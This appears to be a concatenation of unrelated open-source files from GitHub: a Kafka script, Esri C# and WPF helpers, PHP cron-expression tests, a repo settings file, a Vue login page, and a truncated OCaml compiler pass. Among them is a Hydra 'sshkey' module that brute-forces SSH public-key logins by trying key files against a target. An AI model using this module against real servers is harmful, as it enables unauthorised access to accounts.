#!/usr/bin/env python
from kafka_utils.kafka_manual_throttle.main import run

if __name__ == '__main__':
    run()
{ "pile_set_name": "Github" }
/* See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * Esri Inc. licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ using System; using System.Collections.Generic; using System.Linq; using System.Text; using ESRI.ArcGIS.Geodatabase; using ESRI.ArcGIS.Geoprocessor; using ESRI.ArcGIS.ConversionTools; using System.Net; using System.IO; using System.Windows.Forms; namespace com.esri.gpt.publish { /// <summary> /// Helper class with geoprocessing functions. /// </summary> public static class GpHelper { /// <summary> /// The geoprocessor object used to execute geoprocessing tools. /// The track cancel object allows geoprocessing to be interrupted. /// </summary> static private int retVal; static private Geoprocessor geoprocessor; static private object MaxSeverityErrCode = esriGPMessageSeverity.esriGPMessageSeverityError; /// <summary> /// Class constructor handles instantiation of a GeoProcessor /// </summary> static GpHelper() { if (geoprocessor == null) geoprocessor = new Geoprocessor(); // this takes a few seconds... // Instruct the geoprocessing engine to not add output to // the map document, but allow it to overwrite GP output. geoprocessor.AddOutputsToMap = false; geoprocessor.OverwriteOutput = true; } /// <summary> /// Private wrapper used to execute an IGPProcess gpTool, returning either zero /// if the tool's execution succeedes without any errors or the MaxSeverityErrCode /// if one or more errors are realized by the geoprocessor. /// param name="gpTool" the geoprocessing tool /// </summary> static private void Execute(IGPProcess gpTool) { geoprocessor.Execute(gpTool, null); if (geoprocessor.MaxSeverity < (int)MaxSeverityErrCode) retVal = 0; else retVal = geoprocessor.MaxSeverity; } /// <summary> /// Public wrapper used to execute an instantiated ESRITranslator geoprocessing tool. /// The wrapper's try/catch block contains an error message identifying the type of tool. /// param name="gpTool" the geoprocessing tool /// param name="xmlFilePaths" the xml file paths /// </summary> static public int Execute(ESRITranslator gpTool, out string[] xmlFilePaths) { // Instantiate a new string array and set the anticipated paths // into the array. Invoking method is responsible for cleanup // once it has processed the files generated by this method. xmlFilePaths = new string[3]; xmlFilePaths[0] = gpTool.source.ToString(); // Original XML xmlFilePaths[1] = gpTool.output.ToString(); // Translated XML xmlFilePaths[2] = gpTool.logfile.ToString(); // Translation Log try { Execute(gpTool as IGPProcess); } catch (Exception ex) { } return retVal; } /// <summary> /// Public wrapper used to execute an instantiated MDPublisher geoprocessing tool. /// The wrapper's try/catch block contains an error message identifying the type of tool. 
///param name="gpTool" the geoprocessing tool ///param name="publicationResults" the publication results /// </summary> static public int Execute(MDPublisher gpTool, out string[] publicationResults) { publicationResults = new string[1]; object PubMaxSeverityErrCode = esriGPMessageSeverity.esriGPMessageSeverityInformative; try { Execute(gpTool as IGPProcess); if (geoprocessor.MaxSeverity >= (int)PubMaxSeverityErrCode) { publicationResults[0] = geoprocessor.GetMessages(ref PubMaxSeverityErrCode); retVal = -1; } } catch (Exception ex) { StringBuilder sb = new StringBuilder(); sb.AppendLine("Unexpected exception generated by geoprocessing tool"); sb.AppendLine("Metadata Publisher (Conversion Tools - Metadata)"); sb.AppendLine(""); sb.AppendLine(ex.Message); MessageBox.Show(sb.ToString(), "Publication Failure", MessageBoxButtons.OK, MessageBoxIcon.Warning); retVal = -1; } return retVal; } /// <summary> /// Public wrapper used to execute an instantiated ImportMetadata geoprocessing tool. /// The wrapper's try/catch block contains an error message identifying the type of tool. ///param name="gpTool" the geoprocessing tool ///param name="xmlFilePaths" the xml file paths /// </summary> static public int Execute(ImportMetadata gpTool, out string[] xmlFilePaths) { // Instantiate a new string array and set the anticipated paths // into the array. Invoking method is responsible for cleanup // once it has processed the files generated by this method. xmlFilePaths = new string[3]; xmlFilePaths[0] = gpTool.Source_Metadata.ToString(); // Original XML xmlFilePaths[1] = gpTool.Output_Metadata.ToString(); // Translated XML try { Execute(gpTool as IGPProcess); } catch (Exception ex) { StringBuilder sb = new StringBuilder(); sb.AppendLine("Unexpected exception generated by geoprocessing tool"); sb.AppendLine("Metadata Translator (Conversion Tools - Metadata)"); sb.AppendLine(""); sb.AppendLine(ex.Message); MessageBox.Show(sb.ToString(), "Translation Failure", MessageBoxButtons.OK, MessageBoxIcon.Warning); retVal = -1; } return retVal; } /// <summary> /// Returns an instantiated ESRITranslator geoprocessing tool with input /// and output parameters set to the specified values. /// param name="inFile" input file to be translated /// </summary> static public ESRITranslator xmlTranslator(string inFile,string translatorPath) { // Assign/Create the temporary files for translation output string outFile = Path.GetTempFileName(); string logFile = Path.GetTempFileName(); // Identify the XSL transformation to be used string xslTranslator = Path.Combine(Globals.ArcGISInstallationFolderFromCommandLine, translatorPath); // Instantiate the geoprocessing tool and define its parameters // Usage: ESRITranslator_conversion <source> <translator> <output> <logfile> ESRITranslator mdTranslator = new ESRITranslator(); mdTranslator.source = inFile; if (xslTranslator.Trim().Length > 0) { mdTranslator.translator = xslTranslator; // "" } else { mdTranslator.translator = ""; } mdTranslator.output = outFile; mdTranslator.logfile = logFile; return mdTranslator; } /// <summary> /// Returns an instantiated ESRITranslator geoprocessing tool with input /// and output parameters set to the specified values. 
/// param name="inFile" the input file /// param name="xmlFileName" the xml file name /// param name="xsltFile" the xslt file /// </summary> static public ESRITranslator xmlTranslator(string inFile, String xsltFile, String xmlFileName) { // Assign/Create the temporary files for translation output string outFile = xmlFileName; string logFile = Path.GetTempFileName(); // Identify the XSL transformation to be used string xslTranslator = xsltFile; // Instantiate the geoprocessing tool and define its parameters // Usage: ESRITranslator_conversion <source> <translator> <output> <logfile> ESRITranslator mdTranslator = new ESRITranslator(); mdTranslator.source = inFile; mdTranslator.translator = xslTranslator; mdTranslator.output = outFile; mdTranslator.logfile = logFile; return mdTranslator; } /// <summary> /// Returns an instantiated MDPublisher geoprocessing tool with input /// and output parameters set to the specified values. /// param name="inFile" the input file /// param name="mdFileID" a file identifier (like source uri) /// param name="param" the publication parameters /// </summary> static public MDPublisher xmlPublisher(string inFile, string mdFileID, PublicationParams param) { // Instantiate the geoprocessing tool and define its parameters // Usage: MDPublisher_conversion <source> <publisher> <url> <service> <user> <password> MDPublisher mdPublisher = new MDPublisher(); mdPublisher.source = inFile; mdPublisher.publisher = param.CurrentWorkDir; mdPublisher.url = param.ServerUrl; mdPublisher.service = param.Service + ":EB:" + mdFileID; mdPublisher.user = param.UserName; mdPublisher.password = param.Password; return mdPublisher; } /// <summary> /// Returns an instantiated ImportMetadata geoprocessing tool with input /// and output parameters set to the specified values. /// param name="inFile" the input file /// param name="xmlFileName" the xml file name /// </summary> static public ImportMetadata xmlImporter(string inFile, String xmlFileName) { // Assign/Create the temporary files for translation output string outFile = xmlFileName; string logFile = Path.GetTempFileName(); // Instantiate the geoprocessing tool and define its parameters // Usage: MDImporter_conversion <source> <output> ImportMetadata mdImporter = new ImportMetadata(); mdImporter.Source_Metadata = inFile; mdImporter.Output_Metadata = outFile; return mdImporter; } } }
{ "pile_set_name": "Github" }
<?php

namespace Cron\Tests;

use Cron\HoursField;
use DateTime;
use PHPUnit\Framework\TestCase;

/**
 * @author Michael Dowling <[email protected]>
 */
class HoursFieldTest extends TestCase
{
    /**
     * @covers \Cron\HoursField::validate
     */
    public function testValidatesField()
    {
        $f = new HoursField();
        $this->assertTrue($f->validate('1'));
        $this->assertTrue($f->validate('00'));
        $this->assertTrue($f->validate('01'));
        $this->assertTrue($f->validate('*'));
        $this->assertFalse($f->validate('*/3,1,1-12'));
    }

    /**
     * @covers \Cron\HoursField::increment
     */
    public function testIncrementsDate()
    {
        $d = new DateTime('2011-03-15 11:15:00');
        $f = new HoursField();
        $f->increment($d);
        $this->assertSame('2011-03-15 12:00:00', $d->format('Y-m-d H:i:s'));

        $d->setTime(11, 15, 0);
        $f->increment($d, true);
        $this->assertSame('2011-03-15 10:59:00', $d->format('Y-m-d H:i:s'));
    }

    /**
     * @covers \Cron\HoursField::increment
     */
    public function testIncrementsDateWithThirtyMinuteOffsetTimezone()
    {
        $tz = date_default_timezone_get();
        date_default_timezone_set('America/St_Johns');

        $d = new DateTime('2011-03-15 11:15:00');
        $f = new HoursField();
        $f->increment($d);
        $this->assertSame('2011-03-15 12:00:00', $d->format('Y-m-d H:i:s'));

        $d->setTime(11, 15, 0);
        $f->increment($d, true);
        $this->assertSame('2011-03-15 10:59:00', $d->format('Y-m-d H:i:s'));

        date_default_timezone_set($tz);
    }

    /**
     * @covers \Cron\HoursField::increment
     */
    public function testIncrementDateWithFifteenMinuteOffsetTimezone()
    {
        $tz = date_default_timezone_get();
        date_default_timezone_set('Asia/Kathmandu');

        $d = new DateTime('2011-03-15 11:15:00');
        $f = new HoursField();
        $f->increment($d);
        $this->assertSame('2011-03-15 12:00:00', $d->format('Y-m-d H:i:s'));

        $d->setTime(11, 15, 0);
        $f->increment($d, true);
        $this->assertSame('2011-03-15 10:59:00', $d->format('Y-m-d H:i:s'));

        date_default_timezone_set($tz);
    }
}
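These field tests exercise one building block of the cron-expression package they ship with; in normal use the fields are driven through the library's CronExpression entry point, along these lines (a sketch, assuming the mtdowling/cron-expression API this suite belongs to):

<?php

use Cron\CronExpression;

// Sketch only: CronExpression::factory() parses the expression and delegates
// hour matching to HoursField internally.
$cron = CronExpression::factory('0 */2 * * *'); // top of every second hour

var_dump($cron->isDue('2011-03-15 12:00:00')); // bool(true)
echo $cron->getNextRunDate('2011-03-15 11:15:00')->format('Y-m-d H:i:s');
// 2011-03-15 12:00:00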
{ "pile_set_name": "Github" }
rebaseMergeAllowed: true
squashMergeAllowed: true
mergeCommitAllowed: false
branchProtectionRules:
- pattern: master
  isAdminEnforced: true
  requiredStatusCheckContexts:
  - 'Kokoro - Test: Binary Compatibility'
  - 'Kokoro - Test: Code Format'
  - 'Kokoro - Test: Dependencies'
  - 'Kokoro - Test: Java 11'
  - 'Kokoro - Test: Java 7'
  - 'Kokoro - Test: Java 8'
  - 'Kokoro - Test: Linkage Monitor'
  - 'cla/google'
  requiredApprovingReviewCount: 1
  requiresCodeOwnerReviews: true
  requiresStrictStatusChecks: true
permissionRules:
- team: Googlers
  permission: pull
- team: yoshi-java
  permission: push
- team: java-samples-reviewers
  permission: push
- team: yoshi-java-admins
  permission: admin
- team: yoshi-admins
  permission: admin
{ "pile_set_name": "Github" }
/* libssh is available at http://www.libssh.org current version is 0.4.8 If you want support for ssh v1 protocol, you have to add option -DWITH_SSH1=On in the cmake */ #include "hydra-mod.h" #ifndef LIBSSH void dummy_sshkey() { printf("\n"); } #else #include <libssh/libssh.h> #if LIBSSH_VERSION_MAJOR == 0 && LIBSSH_VERSION_MINOR >= 4 extern ssh_session session; extern char *HYDRA_EXIT; extern int new_session; int start_sshkey(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { char *empty = ""; char *login, *key, keep_login[300]; int auth_state = 0, rc = 0; ssh_private_key privkey; if (strlen(login = hydra_get_next_login()) == 0) login = empty; if (strlen(key = hydra_get_next_password()) == 0) key = empty; if (new_session) { if (session) { ssh_disconnect(session); ssh_finalize(); ssh_free(session); } session = ssh_new(); ssh_options_set(session, SSH_OPTIONS_PORT, &port); ssh_options_set(session, SSH_OPTIONS_HOST, hydra_address2string(ip)); ssh_options_set(session, SSH_OPTIONS_USER, login); ssh_options_set(session, SSH_OPTIONS_COMPRESSION_C_S, "none"); ssh_options_set(session, SSH_OPTIONS_COMPRESSION_S_C, "none"); if (ssh_connect(session) != 0) { //if the connection was drop, exit and let hydra main handle it if (verbose) hydra_report(stderr, "[ERROR] could not connect to target port %d\n", port); return 3; } if ((rc = ssh_userauth_none(session, NULL)) == SSH_AUTH_ERROR) { return 3; } else if (rc == SSH_AUTH_SUCCESS) { hydra_report_found_host(port, ip, "sshkey", fp); hydra_completed_pair_found(); if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) return 2; else return 1; } } else new_session = 1; auth_state = ssh_auth_list(session); if ((auth_state & SSH_AUTH_METHOD_PUBLICKEY) > 0) { privkey = privatekey_from_file(session, key, 0, NULL); if (!privkey) { hydra_report(stderr, "[ERROR] skipping invalid private key: \"%s\"\n", key); hydra_completed_pair(); if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) return 2; return 1; } auth_state = ssh_userauth_pubkey(session, NULL, NULL, privkey); } else { return 4; } if (auth_state == SSH_AUTH_ERROR) { new_session = 1; return 1; } if (auth_state == SSH_AUTH_SUCCESS || auth_state == SSH_AUTH_PARTIAL) { hydra_report_found_host(port, ip, "sshkey", fp); hydra_completed_pair_found(); if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) return 2; return 1; } else { strncpy(keep_login, login, sizeof(keep_login) - 1); keep_login[sizeof(keep_login) - 1] = '\0'; hydra_completed_pair(); if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) return 2; login = hydra_get_next_login(); if (strcmp(login, keep_login) == 0) new_session = 0; return 1; } /* not reached */ return 1; } void service_sshkey(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { int run = 1, next_run = 1, sock = -1; hydra_register_socket(sp); if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) return; while (1) { switch (run) { case 1: /* connect and service init function */ next_run = start_sshkey(sock, ip, port, options, miscptr, fp); break; case 2: ssh_disconnect(session); ssh_finalize(); ssh_free(session); hydra_child_exit(0); case 3: ssh_disconnect(session); ssh_finalize(); ssh_free(session); fprintf(stderr, "[ERROR] ssh protocol error\n"); hydra_child_exit(2); case 4: ssh_disconnect(session); ssh_finalize(); ssh_free(session); fprintf(stderr, "[ERROR] ssh target does not support pubkey auth\n"); hydra_child_exit(2); default: 
ssh_disconnect(session); ssh_finalize(); ssh_free(session); hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); hydra_child_exit(2); } run = next_run; } } #else #error "You are not using v0.4.x. Download from http://www.libssh.org and add -DWITH_SSH1=On in cmake to enable SSH v1 support" #endif #endif int service_sshkey_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { // called before the childrens are forked off, so this is the function // which should be filled if initial connections and service setup has to be // performed once only. // // fill if needed. // // return codes: // 0 all OK // -1 error, hydra will exit, so print a good error message here return 0; }
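The header comment amounts to a build recipe; under the usual out-of-tree CMake workflow for the libssh 0.4.x sources it would look roughly like this (paths and version are illustrative):

# Sketch of the build the comment describes; file names are placeholders.
tar xzf libssh-0.4.8.tar.gz && cd libssh-0.4.8
mkdir build && cd build
cmake -DWITH_SSH1=On ..   # enable SSH v1 protocol support, per the note above
make && sudo make install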
{ "pile_set_name": "Github" }
using System.Windows.Controls;
using System.Windows.Media;

namespace Utilities.GUI
{
    /// <summary>
    /// Use this class to access "cached" values for some of the common dependency properties.
    /// It is a lot faster setting them using this if you very frequently set them to the same value (i.e. don't actually change them...)
    /// This specifically tailors PropertyShadow for Canvas so we can also cache Backgrounds, etc.
    /// </summary>
    public class PropertyShadowForPanels : PropertyShadow
    {
        private Panel panel;

        public PropertyShadowForPanels(Panel panel) : base(panel)
        {
            this.panel = panel;
            _shadow_Background = panel.Background;
        }

        private Brush _shadow_Background = null;

        public bool SetShadowBackground(Brush value)
        {
            if (_shadow_Background != value)
            {
                panel.Background = _shadow_Background = value;
                return true;
            }
            else
            {
                return false;
            }
        }
    }
}
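A minimal sketch of the usage pattern the doc comment describes, assuming a WPF Canvas and the PropertyShadow base class from the same repository (not shown here); the payoff is skipping redundant DependencyProperty writes:

// Hypothetical caller: refreshes a canvas highlight many times per second.
var canvas = new Canvas();
var shadow = new PropertyShadowForPanels(canvas);

Brush highlight = Brushes.Yellow;
for (int frame = 0; frame < 1000; frame++)
{
    // Only the first call touches the dependency property; the other 999
    // compare against the cached brush and return false immediately.
    bool changed = shadow.SetShadowBackground(highlight);
}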
{ "pile_set_name": "Github" }
<template>
  <top-page />
</template>

<script>
import { mapActions } from 'vuex'
import { ADD_TOAST_MESSAGE } from 'vuex-toast'
import TopPage from '~/components/pages/TopPage'
import { getOAuthParams, removeOAuthParams } from '~/utils/oauth'

export default {
  components: {
    TopPage
  },
  async fetch({ store }) {
    await store.dispatch('article/getTopics')
    store.dispatch('article/resetArticleData')
  },
  async mounted() {
    try {
      const { code, state } = this.$route.query
      this.$router.replace('/')
      if (!code || !state) return
      const { hasUserId, status } = await this.$store.dispatch('user/checkAuthByYahoo', { code, state })
      if (!hasUserId) {
        this.$store.dispatch('user/setSignUpAuthFlowModal', { showSignUpAuthFlowModal: true })
        this.$store.dispatch('user/setSignUpAuthFlowInputUserIdModal', { isShow: true })
        return
      }
      await this.$store.dispatch('user/getUserSession')
      if (status === 'login') {
        const oauthParams = getOAuthParams()
        if (oauthParams) {
          this.$router.push({ path: 'oauth-authenticate', query: { ...oauthParams } })
          removeOAuthParams()
        }
        return
      }
      this.$store.dispatch('user/setSignUpAuthFlowModal', { showSignUpAuthFlowModal: true })
      this.$store.dispatch('user/setSignUpAuthFlowInputPhoneNumberModal', {
        isSignUpAuthFlowInputPhoneNumberModal: true
      })
    } catch (error) {
      const { message } = error.response.data
      switch (message) {
        case 'EmailExistsException':
          this.sendNotification({
            text: 'The email address linked to the external service you used is already registered'
          })
          this.$store.dispatch('user/setSignUpModal', { showSignUpModal: true })
          break
        case 'NotRegistered':
          this.sendNotification({
            text: 'This account is not registered. Please sign up first',
            type: 'warning'
          })
          break
        default:
          this.sendNotification({
            text: 'An error occurred. Please wait a while and try again',
            type: 'warning'
          })
          break
      }
    }
  },
  methods: {
    ...mapActions({
      sendNotification: ADD_TOAST_MESSAGE
    })
  }
}
</script>
{ "pile_set_name": "Github" }
(* Copyright (c) 2011, Julien Verlaguet All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of Julien Verlaguet nor the names of contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. *) open Utils open Ist module ExtractRecords = struct let rec pat acc ptl = lfold pat_tuple acc ptl and pat_tuple acc pel = lfold pat_el acc pel and pat_el acc (ty, p) = let acc, p = pat_ ty acc p in acc, (ty, p) and pat_ ty acc = function | Pany | Pid _ | Pvalue _ as p -> acc, p | Pvariant (x, p) -> let acc, p = pat acc p in acc, Pvariant (x, p) | Precord pfl -> let v = Ident.tmp() in let acc = List.fold_left (pat_field ty v) acc pfl in acc, Pid v | Pas (v, p) -> let acc, p = pat acc p in acc, Pas (v, p) and pat_field ty v acc = function | PFany -> acc | PFid x -> ([ty, x], Est.Eid (ty, v)) :: acc | PField (fd_id, [l]) -> let xl = List.map get_field_id l in (xl, Est.Efield ((ty, v), fd_id)) :: acc | PField _ -> assert false and get_field_id = function | (ty, Pid x) -> (ty, x) | (ty, Pany) -> (ty, Ident.tmp()) | _ -> assert false end module SplitPat = struct let rec pat ptl = let ptl = List.fold_right pat_tuple ptl [] in ptl and pat_tuple pel acc = match pel with | [] -> assert false | [x] -> let xl = pat_el x in List.fold_right (fun x acc -> [x] :: acc) xl acc | x :: rl -> let rl = pat_tuple rl [] in let x = pat_el x in List.fold_right ( fun x acc -> List.fold_right ( fun rl acc -> (x :: rl) :: acc ) rl acc ) x acc and pat_el (ty, pe) = let pel = pat_ pe in List.map (fun x -> ty, x) pel and pat_ = function | Pany | Pvariant (_, []) | Pid _ as x -> [x] | Pvalue _ -> [Pany] (* TODO only possible value is unit *) | Pvariant (x, p) -> let pl = pat p in List.map (fun y -> Pvariant (x, [y])) pl | Precord pfl -> let pfid = List.fold_left pf_id None pfl in let pfll = List.fold_right pat_field pfl [] in let recl = break_record pfll in (match pfid with | None -> List.map (fun x -> Precord x) recl | Some x -> List.map (fun l -> Precord (x :: l)) recl) | Pas (x, p) -> let pl = pat p in List.map (fun p -> Pas (x, [p])) pl and break_record pfll = match pfll with | [] -> assert false | [x, l] -> List.map (fun y -> [PField (x, [y])]) l | (x, l) :: rl -> let recl = break_record rl in List.fold_right ( fun recl acc -> List.fold_right ( fun p acc -> (PField 
(x, [p]) :: recl) :: acc ) l acc ) recl [] and pf_id acc pf = match pf with | PFany | PFid _ -> Some pf | PField _ -> acc and pat_field pf acc = match pf with | PFany | PFid _ -> acc | PField (x, p) -> (x, pat p) :: acc end module BreakPat = struct (* If you understand this code, good for you ! because I don't ... *) open Est let make_idl l = List.map (fun (ty, _) -> ty, Ident.tmp()) l let add_subst x y m = let l = try IMap.find x m with Not_found -> [] in IMap.add x (y :: l) m let rec partition id s = function | [] -> s, None, [] | ([], _) :: rl2 -> partition id s rl2 | ((ty, Pvariant (x, l1)) :: rl1, a) :: rl2 -> let s, todo, p = partition id s rl2 in s, todo, (match p with | [] -> [ty, `V x, [l1], [rl1, a]] | (_, `V y, subpl, pl) :: rl when x = y -> (ty, `V x, l1 :: subpl, (rl1, a) :: pl) :: rl | l -> let rest1, rest2 = match todo with | None -> [], [] | Some a -> let rest1 = List.map (fun (ty, _) -> ty, Pany) l1 in let l = List.map (fun (x, _) -> x, Pany) rl1 in [rest1], [l, a] in (ty, `V x, l1 :: rest1, (rl1, a) :: rest2) :: l) | ([ty, Pany], a) :: rl2 -> let s, _, p = partition id s rl2 in s, Some a, (ty, `U, [[]], [[], a]) :: p | ((ty, Pany) :: rl1, a) :: rl2 -> let s, _, p = partition id s rl2 in s, Some a, (match p with | [] -> [ty, `U, [[]], [rl1, a]] | part -> List.map ( fun (ty, x, subpl, pl) -> ty, x, subpl, (rl1, a) :: pl ) part) | ([ty, Pid x], a) :: rl2 -> let s, _, p = partition id s rl2 in let s = add_subst x id s in s, Some a, (ty, `U, [[]], [[], a]) :: p | ((ty, Pid x) :: rl1, a) :: rl2 -> let s, _, p = partition id s rl2 in let s = add_subst x id s in s, Some a, (match p with | [] -> [ty, `U, [[]], [rl1, a]] | part -> List.map ( fun (ty, x, subpl, pl) -> ty, x, subpl, (rl1, a) :: pl ) part) | ((_, Precord _) :: _, _) :: _ -> assert false | ((_, Pas (x, p)) :: rl1, a) :: rl2 -> let pa = (p :: rl1, a) :: rl2 in let s, todo, p = partition id s pa in let s = add_subst x id s in s, todo, p let rec pmatch subst idl pal = match idl with | [] -> assert false | id :: rl -> let subst, _, pal = partition id subst pal in let subst, al = lfold ( fun subst (ty, x, subpl, al) -> let idl = make_idl (List.hd subpl) in let pidl = List.map (fun (ty, x) -> ty, Pid x) idl in if idl = [] then let subst, sub = if rl = [] then subst, snd (List.hd al) else pmatch subst rl al in subst, (make_pat ty x pidl, sub) else let subst, pal = make_sub (fst id) rl subst subpl al in let subst, sub = pmatch subst idl pal in subst, (make_pat ty x pidl, sub) ) subst pal in subst, Ematch ([id], al) and make_sub ty idl subst subpl al = match subpl, al with | [], l -> subst, List.map (fun (_, x) -> [ty, Pany], x) l | _, [] -> assert false | p :: rl1, (a :: rl2 as al) -> let subst, sub = if idl = [] then subst, snd a else pmatch subst idl al in let pa = p, sub in let subst, sub = make_sub ty idl subst rl1 rl2 in subst, pa :: sub and make_pat ty x pidl = match x with | `V x -> [ty, Pvariant (x, pidl)] | `U -> [ty, Pany] end module PatOpt = struct open Est let rec dummy e = match e with | Ematch (x, pal) -> let pal = List.map (fun (x, y) -> x, dummy y) pal in let pal = truncate pal in (match pal with | ((_, Pany) :: _, e) :: _ -> e | _ -> Ematch (x, pal)) | x -> x and truncate = function | [] -> [] | ((_, Pany) :: _, _) as last :: _ -> [last] | x :: rl -> x :: truncate rl let rec exhaustive t e = e let expr t e = let e = dummy e in e end type t = { blocks: Est.block list ; eqs: Est.equation list ; subst: Ident.t IMap.t ; } let empty = { blocks = [] ; eqs = [] ; subst = IMap.empty ; } let add_subst subst psubst = 
IMap.fold ( fun x y acc -> match y with | [y] -> IMap.add x (snd y) acc | y -> (* TODO check this *) List.fold_left (fun acc y -> IMap.add (snd y) x acc) acc y ) psubst subst let new_id = Ident.tmp let new_label = Ident.tmp let rec program mdl = List.rev_map module_ mdl and module_ md = { Est.md_sig = md.md_sig ; Est.md_id = md.md_id ; Est.md_decls = md.md_decls ; Est.md_defs = List.map def md.md_defs ; } and def (k, x, p, e) = let t = empty in let idl1 = make_params p in let t, idl2 = tuple t e in let fblock = block t.eqs (Est.Return (false, idl2)) in let def = { Est.df_id = x ; Est.df_kind = k ; Est.df_args = idl1 ; Est.df_return = idl2 ; Est.df_body = fblock :: t.blocks ; } in EstSubst.def t.subst def and make_idl tyl = List.map (fun ty -> (ty, new_id())) tyl and make_params = function | [l] -> List.map ( fun (ty, x) -> match x with | Pvalue (Eunit) | Pany -> (ty, new_id()) | Pid x -> ty, x | _ -> assert false) l | _ -> assert false and block eqs retl = { Est.bl_id = new_label() ; Est.bl_phi = [] ; Est.bl_eqs = List.rev eqs ; Est.bl_ret = retl ; } and pat p lbl = List.map (pat_tuple lbl) p and pat_tuple lbl pel = List.map pat_el pel, lbl and pat_el (ty, p) = ty, pat_ p and pat_ = function | Pany -> Est.Pany | Pid x -> Est.Pid x | Pvalue _ -> assert false | Pvariant (x, []) -> Est.Pvariant (x, []) | Pvariant (x, [p]) -> Est.Pvariant (x, List.map pat_el p) | Pvariant _ -> assert false | Precord pfl -> let id_opt = get_rid pfl in let pfl = List.filter (function PField _ -> true | _ -> false) pfl in let pfl = List.map ( function | PField (x, [p]) -> x, List.map pat_el p | PField _ -> assert false | _ -> assert false ) pfl in Est.Precord (id_opt, pfl) | Pas (x, [[p]]) -> Est.Pas (x, pat_el p) | Pas _ -> assert false and simpl_pat l = try List.iter ( fun (_, p) -> match p with Pid _ | Pany -> () | _ -> raise Exit ) l ; true with Exit -> false and get_rid = function | [] -> None | PFid x :: _ -> Some x | _ :: rl -> get_rid rl and tuple t el = match el with | [] -> t, [] | (tyl, e) :: rl -> let t, idl1 = tuple t rl in let t, idl2 = expr_ t tyl e in t, idl2 @ idl1 and expr t (tyl, e) = let t, idl = expr_ t tyl e in let id = lone idl in let id = fst id, snd id in t, id and expr_ t tyl = function | Eid x -> (* t, [lone tyl, x] *) let idl = make_idl tyl in let ty = match tyl with [ty] -> ty | _ -> assert false in let t = equation t idl (Est.Eid (ty, x)) in t, idl | Efield (e, x) -> let idl = make_idl tyl in let t, id = expr t e in let t = equation t idl (Est.Efield (id, x)) in t, idl | Ematch (e, al) -> let idl = make_idl tyl in let t, eidl = tuple t e in let t, al = List.fold_right action al (t, []) in let psubst = IMap.empty in let psubst, e = BreakPat.pmatch psubst eidl al in let t = { t with subst = add_subst t.subst psubst } in let e = PatOpt.expr t e in let t, e = ematch 0 t tyl e in let t = equation t idl e in t, idl (* | Elet ([l], e1, e2) when simpl_pat l -> let t, idl = tuple t e1 in tuple t e2 *) | Elet (p, e1, e2) -> expr_ t tyl (Ematch (e1, [p, e2])) | Eif (e1, e2, e3) -> let t, id1 = expr t e1 in let eqs = t.eqs in let t = { t with eqs = [] } in let t, idl1 = tuple t e2 in let bl1 = block t.eqs (Est.Lreturn idl1) in let t = { t with blocks = bl1 :: t.blocks } in let t = { t with eqs = [] } in let t, idl2 = tuple t e3 in let bl2 = block t.eqs (Est.Lreturn idl2) in let t = { t with blocks = bl2 :: t.blocks } in let t = { t with eqs = eqs } in let ridl = make_idl tyl in let t = equation t ridl (Est.Eif (id1, bl1.Est.bl_id, bl2.Est.bl_id)) in t, ridl | Eapply (b, fk, ty, x, e) -> let t, x 
